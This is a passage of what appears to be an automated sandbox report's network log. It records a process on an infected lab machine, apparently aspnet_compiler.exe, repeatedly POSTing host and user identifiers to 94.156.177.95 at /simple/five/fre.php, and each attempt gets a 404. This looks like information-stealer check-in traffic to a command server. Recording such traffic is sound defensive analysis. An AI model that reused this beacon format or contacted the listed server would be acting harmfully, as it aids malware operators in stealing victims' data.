                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:45.435973883 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:45 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.44975494.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:45.585858107 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:45.590810061 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:46.563261032 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:46 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.44975594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:46.709453106 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:46.714498043 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:47.660944939 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.44975694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:47.876998901 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:47.882050991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:48.863275051 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:48 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.44975794.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:49.029119968 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:49.034111977 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:49.974807024 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:49 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.44975894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:50.178024054 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:50.182971001 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:51.170826912 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:51 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.44975994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:51.314537048 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:51.319509029 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:52.290635109 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.44976094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:52.448914051 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:52.454052925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:53.435466051 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:53 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.44976194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:53.586914062 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:53.594420910 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:54.533124924 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:54 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.44976294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:54.689611912 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:54.694504976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:56.696182966 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:56 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.44976394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:56.892213106 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:56.897576094 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:57.891151905 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:57 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.44976594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:58.043782949 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:58.049519062 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:58.995851040 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:58 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.44976794.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:59.156507015 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:59.161813974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:00.106925011 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:59 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.44977394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:00.306016922 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:00.310997009 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:01.274903059 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:01 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.44977994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:01.428194046 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:01.433269978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:02.623159885 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:02 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                31192.168.2.44978594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:02.769289970 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:02.774194002 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:03.754801989 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:03 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                32192.168.2.44979594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:03.937114954 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:03.942454100 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:04.921854019 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:04 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                33192.168.2.44980294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:05.069040060 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:05.073941946 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
